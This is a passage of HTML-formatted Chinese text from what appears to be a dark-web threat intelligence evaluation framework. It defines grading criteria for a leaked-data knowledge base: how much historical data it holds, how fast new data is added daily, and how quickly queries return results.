leaf="">等核心特征，从历史知识库积累规模、新增数据扩展速度、数据库响应速度三个维度，构建海量数据知识库能力量化评估体系，用以全面衡量数据治理、知识沉淀、快速检索与动态扩展的综合水平，为暗网威胁研判与数据泄露治理提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">规模化、标准化、可量化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的底层能力支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">8.1.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">历史知识库积累规模</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.1.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">历史知识库积累规模是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量泄露数据知识库能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础性核心指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对长期积累的风险情报数据集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">积累规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据质量</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁情报具备显著的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">历史积累价值</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。若历史知识库规模不足或数据质量未达标准，则难以支撑长期历史轨迹追溯与跨事件关联分析，无法为全域风险画像构建与趋势研判提供有效支撑。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察历史知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">积累规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据处理水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定情报分析的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">深度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">广度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为全域风险预警机制构建提供坚实的数据基础。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.1.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合暗网情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期积累价值</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实际处理难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网情报历史知识库总量规模可达千亿级以上，但受暗网数据</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">碎片化显著、结构差异巨大、重复度偏高</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等特征影响，实施统一结构化清洗、去重与格式化处理的技术难度较高。因此，本框架以历史知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">积累规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据处理水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，重点评估长期积累的风险情报数据集的体量与质量。通过设定科学合理的分级标准，确保指标可客观反映主体在知识库基础能力维度的实际差异。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.1.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">历史知识库积累规模以知识库</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">历史知识库积累规模</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">历史知识库规划中</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">已建立历史知识库，但未进行严格清洗、去重与格式化处理</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">已积累经严格清洗、去重、格式化并进行安全处理的知识库数据 &gt; 100亿</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估长期积累的风险情报数据集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">处理水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化知识库数据规模，可客观反映主体在历史数据治理能力上的实际差异，为后续情报分析、风险预警与事件研判提供重要的数据基础。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">8.2.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">新增数据扩展速度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.2.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">新增数据扩展速度是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量泄露数据知识库能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">重要动态指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续增长能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">动态更新能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">暗网威胁情报具备显著的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">动态性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，新泄露事件、新增数据交易及攻击活动每日持续产生。若新增数据扩展速度不足，则难以适配暗网威胁的演化节奏，易造成知识库时效性衰减，无法为及时、有效的风险预警与趋势研判提供支撑。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察每日新增入库数据的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期应用价值</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为全域风险预警机制构建提供持续性的数据支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.2.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合暗网威胁情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">动态性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与知识库持续更新需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">知识库增量水平，是判别知识库能否保持</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期有效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的重要依据。事件驱动型扩展通常呈现爆发式增长特征，但</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">相对不足；常态化运营可实现每日稳定、持续的增量更新，更有利于知识库</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期价值</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的沉淀与积累。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以每日新增入库数据的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定科学合理的分级标准，确保指标可客观反映主体在知识库动态更新能力维度的实际差异。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.2.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">新增数据扩展速度以每日新增入库数据的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">规模</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="107" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="368" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="93" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="107" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">新增数据扩展速度</span></span></p></td><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">知识库更新规划中</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">随事件不定期扩展</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="368" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">每天稳定新增入库数据量在数千万量级以上</span></span></p></td><td data-colwidth="93" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">持续增长能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">动态更新能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。通过量化每日新增入库数据的规模与稳定性，可客观反映主体在知识库动态更新能力上的实际差异，为保障知识库</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">时效性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">长期价值积累</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供重要支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">8.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">数据库响应速度</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数据库响应速度是</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">海量泄露数据知识库能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">关键效能指标</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。本指标核心设计目的，在于对知识库在数据检索、订阅、输出等全流程操作中的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">响应效率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">开展评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">海量泄露数据知识库面向超大规模非结构化数据开展查询与订阅操作，数据体量庞大、关联维度复杂，响应时延直接决定威胁研判、风险核验与预警推送的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实时性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。若响应速度不足，将导致情报获取滞后、研判效率降低，无法满足暗网威胁</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">快速发现、快速核验、快速处置</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的实战需求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本指标重点考察从指令输入至结果全量返回的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">耗时水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，该项能力直接决定知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实战可用度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">运营效能</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为全域风险预警与事件快速研判提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高效率、低时延</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的底层支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标设计依据主要结合海量泄露数据知识库的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">数据规模、检索复杂度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实战化响应</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">海量暗网泄露数据知识库具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">体量巨大、结构异构、关联关系复杂</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等特征，全量检索与多条件联合查询对算力、索引结构、数据治理水平提出较高要求。响应速度是衡量知识库</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">底层架构合理性、索引优化能力、数据治理成熟度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的核心外在表现。在实战场景中，情报检索与订阅的时延直接影响威胁闭环效率，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">低时延响应</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">是实现威胁早发现、早处置的重要前提。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，本框架以指令输入至结果全量返回的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">完成耗时</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为量化标准，通过设定科学合理的分级阈值，确保指标可客观反映主体在知识库高性能支撑能力维度的实际差异。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">8.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">参数指标</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">数据库响应速度以指令输入至结果全量响应完成的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">耗时</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为主要量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: 